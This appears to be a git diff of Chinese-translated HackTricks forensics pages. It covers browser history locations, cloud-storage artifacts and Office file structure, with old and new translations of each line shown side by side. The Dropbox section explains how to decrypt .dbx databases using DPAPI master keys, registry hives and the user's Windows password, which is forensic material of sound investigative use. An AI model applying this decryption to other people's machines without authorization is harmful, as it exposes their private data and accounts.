检查工具 [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html),你可以找到包含下载元数据的容器:
![](<../../../.gitbook/assets/image (445).png>)
通过获取“ResponseHeaders”列的信息您可以将该信息从十六进制转换为URL、文件类型和下载文件的位置。
获取 "ResponseHeaders" 列的信息,你可以将该信息从十六进制转换,并获得 URL、文件类型和下载文件的位置。
#### 文件
查看路径_**%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory**_
查看路径 _**%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory**_
### **历史记录**
可以使用工具[BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html)来读取历史记录。但首先,您需要在高级选项中指定浏览器和提取的历史记录文件的位置。
工具 [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) 可用于阅读历史记录。但首先,你需要在高级选项中指定浏览器和提取的历史文件的位置。
#### **元数据**
* ModifiedTime找到URL的第一次时间
* AccessedTime:最后一次时间
* AccessCount访问次数
* ModifiedTime: 第一次发现 URL 的时间
* AccessedTime: 最后一次
* AccessCount: 访问次数
#### **文件**
_**userprofile%\Appdata\Local\Microsoft\Windows\History\History.IE5**_和_**userprofile%\Appdata\Local\Microsoft\Windows\History\Low\History.IE5**_中搜索
搜索 _**userprofile%\Appdata\Local\Microsoft\Windows\History\History.IE5**_ _**userprofile%\Appdata\Local\Microsoft\Windows\History\Low\History.IE5**_
### **键入的URL**
### **输入的 URL**
此信息可以在注册表NTDUSER.DAT的路径中找到:
这些信息可以在注册表 NTDUSER.DAT 中的以下路径找到:
* _**Software\Microsoft\InternetExplorer\TypedURLs**_
* 存储用户输入的最后50个URL
* 存储用户输入的最后 50 URL
* _**Software\Microsoft\InternetExplorer\TypedURLsTime**_
* URL最后一次输入的时间
* 最后一次输入 URL 的时间
## Microsoft Edge
要分析Microsoft Edge的工件所有关于缓存和位置的解释IE 11中的仍然有效唯一的区别是基本定位在这种情况下是_**%userprofile%\Appdata\Local\Packages**_如下面的路径所示):
分析 Microsoft Edge 工件时前一节IE 11关于缓存和位置的所有**解释都适用**,唯一的区别是这种情况下的基本位置是 _**%userprofile%\Appdata\Local\Packages**_(如下路径所示):
* 配置文件路径_**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC**_
* 历史记录、Cookie和下载_**C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat**_
* 历史记录、Cookies 和下载_**C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat**_
* 设置、书签和阅读列表_**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb**_
* 缓存_**C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC#!XXX\MicrosoftEdge\Cache**_
* 最后活的会话_**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active**_
* 最后活的会话_**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active**_
## **Safari**
数据库可以在`/Users/$User/Library/Safari`中找到
数据库可以在 `/Users/$User/Library/Safari` 中找到
* **History.db**:表`history_visits`和`history_items`包含有关历史记录和时间戳信息。
* `sqlite3 ~/Library/Safari/History.db "SELECT h.visit_time, i.url FROM history_visits h INNER JOIN history_items i ON h.history_item = i.id"`
* **Downloads.plist**:包含有关下载文件的信息。
* **Book-marks.plist**收藏的URL。
* **TopSites.plist**:用户浏览的最常访问网站列表。
* **Extensions.plist**检索Safari浏览器扩展的旧式列表。
* `plutil -p ~/Library/Safari/Extensions/Extensions.plist| grep "Bundle Directory Name" | sort --ignore-case`
* `pluginkit -mDvvv -p com.apple.Safari.extension`
* **History.db**:表 `history_visits` __ `history_items` 包含历史记录和时间戳信息。
* `sqlite3 ~/Library/Safari/History.db "SELECT h.visit_time, i.url FROM history_visits h INNER JOIN history_items i ON h.history_item = i.id"`
* **Downloads.plist**:包含下载文件的信息。
* **Book-marks.plist**URL 书签
* **TopSites.plist**:用户浏览的最常访问网站列表。
* **Extensions.plist**:检索旧式 Safari 浏览器扩展列表。
* `plutil -p ~/Library/Safari/Extensions/Extensions.plist| grep "Bundle Directory Name" | sort --ignore-case`
* `pluginkit -mDvvv -p com.apple.Safari.extension`
* **UserNotificationPermissions.plist**:允许推送通知的域。
* `plutil -p ~/Library/Safari/UserNotificationPermissions.plist | grep -a3 '"Permission" => 1'`
* **LastSession.plist**用户退出Safari时打开的标签。
* `plutil -p ~/Library/Safari/LastSession.plist | grep -iv sessionstate`
* **浏览器内置的反钓鱼功能**`defaults read com.apple.Safari WarnAboutFraudulentWebsites`
* 回复应为1表示该设置处于活动状态
* `plutil -p ~/Library/Safari/UserNotificationPermissions.plist | grep -a3 '"Permission" => 1'`
* **LastSession.plist**:用户退出 Safari 时打开的标签
* `plutil -p ~/Library/Safari/LastSession.plist | grep -iv sessionstate`
* **浏览器内置的反钓鱼功能** `defaults read com.apple.Safari WarnAboutFraudulentWebsites`
* 回复应为 1以表示设置已激活
## Opera
数据库可以在`/Users/$USER/Library/Application Support/com.operasoftware.Opera`中找到
数据库可以在 `/Users/$USER/Library/Application Support/com.operasoftware.Opera` 中找到
Opera以与Google Chrome完全相同的格式存储浏览器历史记录和下载数据。这适用于文件名和表名。
Opera **以与 Google Chrome 完全相同的格式存储浏览器历史记录和下载数据**。这适用于文件名以及表名。
* **浏览器内置的反钓鱼功能**`grep --color 'fraud_protection_enabled' ~/Library/Application Support/com.operasoftware.Opera/Preferences`
* **fraud\_protection\_enabled**应为**true**
* **浏览器内置的反钓鱼功能** `grep --color 'fraud_protection_enabled' ~/Library/Application Support/com.operasoftware.Opera/Preferences`
* **fraud_protection_enabled** 应为 **true**
<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流程**,使用全球**最先进的**社区工具。\
使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建并**自动化工作流程**,由世界上**最先进**的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习 AWS 黑客攻击到高手,通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* 您在**网络安全公司**工作吗您想在HackTricks中看到您的**公司广告**吗?或者您想获得**PEASS的最新版本或以PDF格式下载HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks衣物**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**
支持 HackTricks 的其他方式:
* 如果你想在 **HackTricks** 中看到你的**公司广告**或**下载 HackTricks 的 PDF**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family) 收藏
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享你的黑客技巧。
</details>
```

97
forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
View file

@ -2,130 +2,135 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习AWS黑客技术成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
* 你在一个**网络安全公司**工作吗?你想在 HackTricks 中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
</details>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。\
使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建并**自动化工作流程**,由世界上**最先进的**社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## OneDrive
Windows 中,可以在 `\Users\<username>\AppData\Local\Microsoft\OneDrive` 找到 OneDrive 文件夹。在 `logs\Personal` 文件夹中,可以找到名为 `SyncDiagnostics.log` 的文件,其中包含一些有关同步文件的有趣数据:
在Windows中可以在 `\Users\<username>\AppData\Local\Microsoft\OneDrive` 找到OneDrive文件夹。在 `logs\Personal` 内部,可以找到名为 `SyncDiagnostics.log` 的文件,其中包含了关于同步文件的一些有趣数据:
* 字节为单位的大小
* 字节大小
* 创建日期
* 修改日期
* 云端文件数
* 文件夹中的文件数
* **CID**OneDrive 用户的唯一标识符
* 云中的文件数量
* 文件夹中的文件数
* **CID**OneDrive用户的唯一ID
* 报告生成时间
* 操作系统的硬盘大小
* 操作系统HD的大小
找到 CID 后,建议**搜索包含此 ID 的文件**。您可能能够找到文件名为_**\<CID>.ini**_ 和 _**\<CID>.dat**_ 的文件,其中可能包含与 OneDrive 同步的文件的有趣信息。
找到CID后建议**搜索包含此ID的文件**。您可能能够找到名为 _**\<CID>.ini**__**\<CID>.dat**_ 的文件这些文件可能包含像与OneDrive同步的文件名等有趣信息。
## Google Drive
Windows 中,可以在 `\Users\<username>\AppData\Local\Google\Drive\user_default` 找到主要的 Google Drive 文件夹\
该文件夹包含一个名为 Sync\_log.log 的文件,其中包含户的电子邮件地址、文件名、时间戳、文件的 MD5 哈希等信息。即使已删除的文件也会在该日志文件中出现,并带有相应的 MD5。
在Windows中可以在 `\Users\<username>\AppData\Local\Google\Drive\user_default` 找到主要的Google Drive文件夹\
该文件夹包含一个名为 Sync\_log.log 的文件,其中包含户的电子邮件地址、文件名、时间戳、文件的MD5哈希等信息。即使已删除的文件也会在该日志文件中出现并带有相应的MD5。
文件 **`Cloud_graph\Cloud_graph.db`** 是一个 SQLite 数据库,其中包含表 **`cloud_graph_entry`**。在这个表中,您可以找到**同步的文件**的**名称**、修改时间、大小和文件的 MD5 校验和。
文件 **`Cloud_graph\Cloud_graph.db`** 是一个sqlite数据库,其中包含表 **`cloud_graph_entry`**。在这个表中,您可以找到**同步**文件的**名称**、修改时间、大小和文件的MD5校验和。
数据库 **`Sync_config.db`** 的表数据包含户的电子邮件地址、共享文件夹的路径和 Google Drive 版本。
数据库 **`Sync_config.db`** 的表数据包含户的电子邮件地址、共享文件夹的路径和Google Drive版本。
## Dropbox
Dropbox 使用 **SQLite 数据库**来管理文件。在这\
Dropbox使用**SQLite数据库**来管理文件。在这\
您可以在以下文件夹中找到数据库:
* `\Users\<username>\AppData\Local\Dropbox`
* `\Users\<username>\AppData\Local\Dropbox\Instance1`
* `\Users\<username>\AppData\Roaming\Dropbox`
主要的数据库有
主要数据库包括
* Sigstore.dbx
* Filecache.dbx
* Deleted.dbx
* Config.dbx
".dbx" 扩展名表示数据库是加密的。Dropbox 使用 **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/ms995355\(v=msdn.10\)?redirectedfrom=MSDN))
".dbx"扩展名意味着**数据库**是**加密的**。Dropbox使用**DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/ms995355\(v=msdn.10\)?redirectedfrom=MSDN))
要更好地理解 Dropbox 使用的加密方式,您可以阅读 [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html)。
要更好地理解Dropbox使用的加密您可以阅读 [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html)。
然而,主要信息如下
然而,主要信息
* **熵**d114a55212655f74bd772e37e64aee9b
* **盐**0D638C092E8B82FC452883F95F355B8E
* **算法**PBKDF2
* **迭代次数**1066
除了些信息,要解密数据库,您还需要:
除了些信息,要解密数据库,您还需要:
* **加密的 DPAPI 密钥**:您可以在注册表中的 `NTUSER.DAT\Software\Dropbox\ks\client` 中找到它(将此数据导出为二进制)
* **`SYSTEM`** 和 **`SECURITY`** hive
* **DPAPI 主密钥**:可以在 `\Users\<username>\AppData\Roaming\Microsoft\Protect` 中找到
* **加密的DPAPI密钥**:您可以在注册表中的 `NTUSER.DAT\Software\Dropbox\ks\client` 找到它(以二进制形式导出此数据)
* **`SYSTEM`** 和 **`SECURITY`** 蜂巢
* **DPAPI主密钥**:可以在 `\Users\<username>\AppData\Roaming\Microsoft\Protect` 找到
* Windows用户的**用户名**和**密码**
然后您可以使用工具 [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi\_data\_decryptor.html)****
然后您可以使用工具 [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi_data_decryptor.html)****
![](<../../../.gitbook/assets/image (448).png>)
如果一切顺利,该工具将指示您需要**用于恢复原始密钥**的**主密钥**。要恢复原始密钥,只需在此[cyber\_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\))中将主密钥作为“passphrase”放入 receipt 中。
如果一切顺利,该工具将指示您需要**使用的主密钥**来**恢复原始密钥**。要恢复原始密钥,只需使用这个 [cyber_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive_PBKDF2_key(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D)),将主密钥作为“密码短语”放入收据中。
生成的十六进制即为用于加密数据库的最终密钥,可以使用以下方法解密:
得到的十六进制是用于加密数据库的最终密钥,可以用以下方式解密:
```bash
sqlite -k <Obtained Key> config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db
```
**`config.dbx`**数据库包含以下内容
**`config.dbx`** 数据库包含:
* **Email**:用户的电子邮件
* **usernamedisplayname**:用户的名称
* **dropbox\_path**Dropbox文件夹所在的路径
* **Host\_id**用于在云端进行身份验证的哈希值。只能通过网络撤销此哈希值
* **Host\_id**:用于认证云服务的哈希。这只能从网页上撤销
* **Root\_ns**:用户标识符
**`filecache.db`**数据库包含与Dropbox同步的所有文件和文件夹的信息。表`File_journal`是最有用的表之一
**`filecache.db`** 数据库包含与Dropbox同步的所有文件和文件夹的信息。`File_journal` 表包含更多有用信息
* **Server\_path**:文件在服务器内的路径(此路径前面是客户端的`host_id`)。
* **Server\_path**:文件在服务器内的路径(该路径前面有客户端的 `host_id`)。
* **local\_sjid**:文件的版本
* **local\_mtime**:修改日期
* **local\_ctime**:创建日期
此数据库中的其他表包含更多有趣的信息:
这个数据库内的其他表包含更多有趣的信息:
* **block\_cache**Dropbox的所有文件和文件夹的哈希
* **block\_ref**:将表`block_cache`中的哈希ID与表`file_journal`中的文件ID相关联
* **block\_cache**Dropbox的所有文件和文件夹的哈希
* **block\_ref**:将 `block_cache` 表的哈希ID与 `file_journal` 表的文件ID关联
* **mount\_table**Dropbox的共享文件夹
* **deleted\_fields**Dropbox已删除的文件
* **date\_added**
<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和自动化由全球**最先进的**社区工具提供支持的工作流程。\
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 来轻松构建和**自动化工作流程**,由世界上**最先进**的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习AWS hacking成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
* 您在**网络安全公司**工作吗您想在HackTricks中看到您的公司广告吗或者您想获得最新版本的PEASS或下载PDF格式的HackTricks吗请查看[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks衣物**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在 **HackTricks** 中看到您的**公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的hacking技巧。
</details>

94
forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
View file

@ -1,30 +1,32 @@
# 办公文件分析
# Office文件分析
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零到英雄学习AWS黑客技术通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* 你在一家**网络安全公司**工作吗想要在HackTricks中看到你的**公司广告**吗?或者你想要**获取PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter**上**关注**我 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流程**,使用全球**最先进的**社区工具。\
使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 来轻松构建并**自动化工作流程**,由世界上**最先进**的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## 介绍
微软创建了**数十种办公文档文件格式**,其中许多因其能够**包含宏**VBA脚本而在分发钓鱼攻击和恶意软件方面非常流行
Microsoft创建了**数十种Office文档文件格式**,其中许多因为能够**包含宏**VBA脚本而受到用于分发网络钓鱼攻击和恶意软件的欢迎
广义上说,办公文件格式分为两代:**OLE格式**文件扩展名如RTF、DOC、XLS、PPT和“**Office Open XML**”格式文件扩展名包括DOCX、XLSX、PPTX。**两种**格式都是结构化的、复合文件二进制格式,可以**启用链接或嵌入内容**对象。OOXML文件是zip文件容器这意味着检查隐藏数据的最简单方法之一就是简单地`unzip`文档:
广义上Office文件格式有两代**OLE格式**文件扩展名如RTF、DOC、XLS、PPT以及"**Office Open XML**"格式文件扩展名包括DOCX、XLSX、PPTX。**两种**格式都是结构化的、复合文件二进制格式,能够**启用链接或嵌入内容**对象。OOXML文件是zip文件容器这意味着检查隐藏数据最简单的方法之一就是直接`unzip`文档:
```
$ unzip example.docx
Archive: example.docx
@ -65,87 +67,45 @@ $ tree
│ └── theme1.xml
└── webSettings.xml
```
正如你所看到的文件和文件夹层次结构创建了一部分结构其余部分在XML文件中指定。[_New Steganographic Techniques for the OOXML File Format_, 2011](http://download.springer.com/static/pdf/713/chp%3A10.1007%2F978-3-642-23300-5\_27.pdf?originUrl=http%3A%2F%2Flink.springer.com%2Fchapter%2F10.1007%2F978-3-642-23300-5\_27\&token2=exp=1497911340\~acl=%2Fstatic%2Fpdf%2F713%2Fchp%25253A10.1007%25252F978-3-642-23300-5\_27.pdf%3ForiginUrl%3Dhttp%253A%252F%252Flink.springer.com%252Fchapter%252F10.1007%252F978-3-642-23300-5\_27\*\~hmac=aca7e2655354b656ca7d699e8e68ceb19a95bcf64e1ac67354d8bca04146fd3d)详细介绍了一些数据隐藏技术的想法但CTF挑战的作者会想出新的方法。
正如您所见一些结构是由文件和文件夹层次结构创建的。其余的则在XML文件内指定。[_New Steganographic Techniques for the OOXML File Format_, 2011](http://download.springer.com/static/pdf/713/chp%3A10.1007%2F978-3-642-23300-5\_27.pdf?originUrl=http%3A%2F%2Flink.springer.com%2Fchapter%2F10.1007%2F978-3-642-23300-5\_27\&token2=exp=1497911340\~acl=%2Fstatic%2Fpdf%2F713%2Fchp%25253A10.1007%25252F978-3-642-23300-5\_27.pdf%3ForiginUrl%3Dhttp%253A%252F%252Flink.springer.com%252Fchapter%252F10.1007%252F978-3-642-23300-5\_27\*\~hmac=aca7e2655354b656ca7d699e8e68ceb19a95bcf64e1ac67354d8bca04146fd3d) 详细介绍了一些数据隐藏技术的想法但CTF挑战的作者总会想出新的方法。
再次强调,存在一个用于检查和分析OLE和OOXML文档的Python工具集[oletools](http://www.decalage.info/python/oletools)。特别是对于OOXML文档[OfficeDissector](https://www.officedissector.com)是一个非常强大的分析框架和Python库。后者包括一个[使用指南](https://github.com/grierforensics/officedissector/blob/master/doc/html/\_sources/txt/ANALYZING\_OOXML.txt)。
再次强调,存在一个Python工具集用于**分析OLE和OOXML文档**[oletools](http://www.decalage.info/python/oletools)。特别是对于OOXML文档[OfficeDissector](https://www.officedissector.com) 是一个非常强大的分析框架和Python库。后者包括[快速使用指南](https://github.com/grierforensics/officedissector/blob/master/doc/html/\_sources/txt/ANALYZING\_OOXML.txt)。
